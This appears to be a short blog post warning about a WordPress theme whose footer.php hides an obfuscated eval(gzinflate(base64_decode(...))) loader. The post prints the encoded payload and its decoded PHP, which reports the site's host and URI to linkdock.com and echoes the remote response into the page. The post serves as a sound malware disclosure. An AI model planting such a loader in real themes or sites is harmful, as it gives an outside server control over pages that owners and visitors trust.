I was looking for a theme to use in a WordPress blog and I stumbled on this one.
Cool, I thought, I might use it… but… hey… why there’s this weird stuff in footer.php?
1 2 3 4 5 6 7 8 | <? eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0 NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWEC ePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc 5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRL vlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/ b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5 p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBa hOh0EIT7b8A'))); ?> |
Uhm… it looks very suspicious. Too suspicious. Let’s change eval with die and check what’s all that stuff:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | error_reporting(0); $CodeURL = "http://linkdock.com/content.php?id=&host=". urlencode($_SERVER["HTTP_HOST"])."&uri=". urlencode($_SERVER["REQUEST_URI"]); if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) { echo @file_get_contents($CodeURL); } elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) { $content = @file($CodeURL); echo @join("", $content); } elseif (function_exists("curl_init")) { $ch = curl_init($CodeURL); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); } |
Yep. It definitely looks like a backdoor.
It seems that you can never be too much careful…
(it seems like the first version I’ve download is different than the one on the site mentioned above, although there’s still something evil in footer.php)